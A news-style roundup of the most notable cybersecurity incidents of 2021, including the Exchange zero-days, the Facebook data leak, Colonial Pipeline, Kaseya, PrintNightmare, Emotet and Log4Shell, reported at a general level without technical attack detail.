It’s been a whirlwind of a year, with the very worst of COVID-19 sandwiching Facebook’s annual PR crisis and a litany of cyber security tales from the deep. Indeed, security teams are still scrambling daily to wrestle with the number of threats facing businesses, while ransomware gangs continue to ransack their way across the globe.
The likes of REvil and Emotet have terrorised businesses, while also sporadically and unexpectedly shutting down amid mounting pressure from law enforcement. From crippling attacks on critical national infrastructure to the persistent exploitation of zero-day vulnerabilities, most recently in the form of the Log4Shell vulnerability, we round up the most shocking cyber security scandals of the past 12 months.
Microsoft Exchange under siege
It’s been a torrid time for Microsoft Exchange this year, with zero-day exploits and vulnerabilities emerging from every corner.
The problems began in March, when Microsoft announced it’d discovered what it believed to be the Chinese hacking group, Hafnium, executing a sophisticated attack using a chain of four previously undisclosed zero-day flaws targeting on-premise Exchange servers. Hafnium gained access using these vulnerabilities and stolen passwords, before creating a web shell around the compromised servers. This allowed them to exfiltrate email data remotely.
It’s estimated a total of 30,000 servers were compromised across the world, including 7,000 in the UK. Patches were soon released for large organisations before a one-click patch was issued for smaller businesses without dedicated IT teams.
Unfortunately, this was shortly followed by a series of additional zero-days, including three the NSA disclosed in April, before ProxyToken was unleashed in August. This flaw, again
hastily patched, could have been abused to steal personal information and perform configuration actions on target mailboxes. Zero Day Initiative experts said, at the time, this could have allowed a hacker to gather and exfiltrate all email addresses in a person’s inbox, which would then be harnessed in phishing campaigns. The ProxyLogon exploit was subsequently at the centre of various attacks, with Epsilon Red targeted servers in June. At least ten groups have since abused the Hafnium exploit chain, with Qakbot and SquirrelWaffle malspam most recently spreading via unpatched servers.
Facebook’s first major snafu of the year
Facebook, once more, endured a crisis-laden year, with a humongous data scandal setting the tone for a rocky few months that eventually led to the damaging revelations detailed by whistleblower Frances Haugen.
On 3 April, somebody uploaded a database containing the personal information of 533 million users to a publicly accessible popular deep web hacking forum. This represented a fifth of Facebook’s user base, mainly based in the UK, US, and India. The leak included phone numbers, full names, previous locations, birth dates, relationship statuses, biographies, and, in some cases, email addresses. Experts, at the time, said the information would likely be used for social engineering campaigns, hacking, and marketing purposes.
Facebook initially explained the hackers scraped data from its servers by exploiting a misconfiguration in its contact importer. This, however, was actually part of a vulnerability the firm had patched in 2019; it knew the data had been compromised but the situation was out of its hands. The unknown hacker then, last year, created the database using this stolen information and established a business on Telegram whereby users paid a small fee to query the database and find phone numbers linked to Facebook profiles. Despite this endeavour, the hacker changed tack and dumped it all online in April.
Colonial’s Pipeline runs dry
The double-extortion ransomware siege on Colonial Pipeline was among the most widely-reported attacks of 2021 due to the sheer scale of impact it had on US infrastructure.
The firm managing the 5,500-mile pipeline between Texas and New York, tasked with delivering 45% of the East Coast’s fuel, was brought to its knees for six days, with supplies cut off, in May. Russian-linked DarkSide took credit, having previously sold information about its attacks to stock traders the previous month.
DarkSide also threatened to leak information from the 100GB of data it stole before locking down the company’s systems. For consumers, limited fuel supply meant US residents had to physically compete with one another for resources, as a hoarding craze took hold.
Before long, Colonial Pipeline went against cyber security best practice and paid the ransom, reported to be $4.4 million (roughly £3.3 million). The Department of Justice (DoJ) eventually recovered most of this sum, but the fear of future attacks catalysed a shift in focus for policymakers. Stricter rules around securing pipelines from cyber attacks were swiftly introduced, and the incident prompted the Biden administration to promote ransomware to ‘terrorism’ status. The attack was so bad that even DarkSide was forced to change its operation, namely introducing a moderation process following a massive backlash.
Kaseya supply chain attack cripples millions of devices
The summer months were marred with yet another mass-scale cyber attack, this time on Kaseya’s VSA product, a tool Managed Service Providers (MSPs) use to monitor their clients’ IT needs. The culprit, REvil, targeted a zero-day flaw in VSA specifically due to functionality that allowed IT managers to push updates to clients without intervention.
Ironically, Kaseya had been working with Dutch security firm DIVD CSIRT at the time to patch the flaw REvil eventually exploited; this was a race against the clock the researchers unfortunately lost. Kaseya first announced 50 customers were affected but, in reality, the ransomware hit more than 1,000 victims and crippled more than a million devices. This isn’t to mention REvil’s gargantuan reported ransom demand of $70 million (roughly £52 million) for supplying the universal decryptor.
What followed was a total shut down of VSA servers, with researchers eventually patching the three zero-day flaws that facilitated the attack. Opportunistic cyber criminals, though, persisted by capitalising on the mayhem with specialised phishing campaigns purporting to supply system-fixing updates from Kaseya. Weeks later, Kaseya obtained a decryptor through a third party, insisting no payment was made.
Curiously, REvil shut down days after the attack; its servers and website were rendered offline. The group, however, returned in September by reopening its ‘Happy Blog’ – a site on which victims who refuse to pay are named and ‘shamed’ – before vanishing again in light of a Europol-led sting operation.
PrintNightmare: A comedy of errors
The aptly-named PrintNightmare fiasco arose at the start of July after a devastating misunderstanding led to a reputable cyber security vendor, Sangfor, inadvertently publishing a working exploit for an unpatched vulnerability.
Microsoft had initially patched a privilege escalation vulnerability in its Print Spooler component on 8 June as part of its routine Patch Tuesday wave of updates. The firm, however, two weeks later upgraded the severity of the bug to remote code execution (RCE). The vulnerability in question allowed attackers to install applications, view, change or delete data, or create new accounts with full privileges on targeted devices.
Sangfor researchers, meanwhile, were conducting their own research into Print Spooler vulnerabilities, ahead of a presentation at the Black Hat cyber security conference in August. When Microsoft upgraded the severity of the now-patched PrintSpooler flaw, the researchers published a proof-of-concept exploit for an RCE flaw ahead of time, mistakenly believing this to be the same vulnerability that Microsoft had patched in June.
By the time Sangfor realised this mistake and took its report down, the exploitation was already being distributed across the hacking community.
Microsoft promptly issued a patch, but this ultimately proved unsuccessful, after another researcher published a workaround. Then, the firm released a working patch on its second attempt on 13 July, alongside fixes for 117 other flaws.
Emotet buried by Europol – then rises from the ashes
Emotet was undoubtedly one of the most devastating strains of malware ever authored; at its peak, it provided an access point for up to 70% of malware strains in global circulation. The infamous banking Trojan’s significance and effectiveness was incontrovertible, but Christmas came late for security teams in January as a coordinated law enforcement effort, led by Europol, took it down for good.
That was, at least, the line they touted at the time. Europol officers, alongside colleagues from the UK, US, and France, seized several hundred servers comprising Emotet’s infrastructure. It was a huge relief, given the malware was, as of a month earlier, affecting up to 100,000 users per day. German authorities later used the seized Emotet servers to uninstall the Trojan from infected devices – a dagger to the heart.
This brief period of bliss lasted just six months, however, with researchers discovering a retooled iteration of Emotet re-emerging in the wild. Back with better-protected code and infrastructure, security experts are now, once again, on high alert, warning staff of the telltale signs of Emotet-infected emails. Whether this resurgent strain becomes as prolific as its predecessor remains to be seen, but it’s certainly a comeback that’s sent shockwaves through the security community.
Log4Shell is a genuine nightmare before Christmas
Discovered just weeks before the year’s end as a glitch in Minecraft, of all places, chatter continues to run rife in the infosec community about just how dangerous the flaw known as Log4Shell could be.
Log4Shell is a zero-day vulnerability in the popular log4j 2 library, a logger that’s almost ubiquitous in global Java apps and enterprise products. Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Fline, are thought to be particularly vulnerable. There are, however, products being found to be vulnerable with each day that passes since its 9 December discovery.
While the vast majority of products written in Java are thought to be vulnerable to the RCE tracked as CVE-2021-44228, the true breadth of the attack surface is still yet to be confirmed and isn’t likely to be fully realised for months, according to experts. Attackers, however, can certainly utilise a long-known exploitation method known as Java Naming and Directory Interface (JNDI) injection to achieve RCE.
There are currently no known major exploitations of the vulnerability, but early evidence points to Mirai botnets being launched using vulnerable infrastructure, with other attacks likely. To that effect, Check Point researchers observed more than 800,000 attack attempts using the vulnerability within 72 hours of disclosure. With patches available, it’s set to be a turbulent and anxious few weeks for cyber security professionals across the globe as the industry watches the prospective horrors unfold.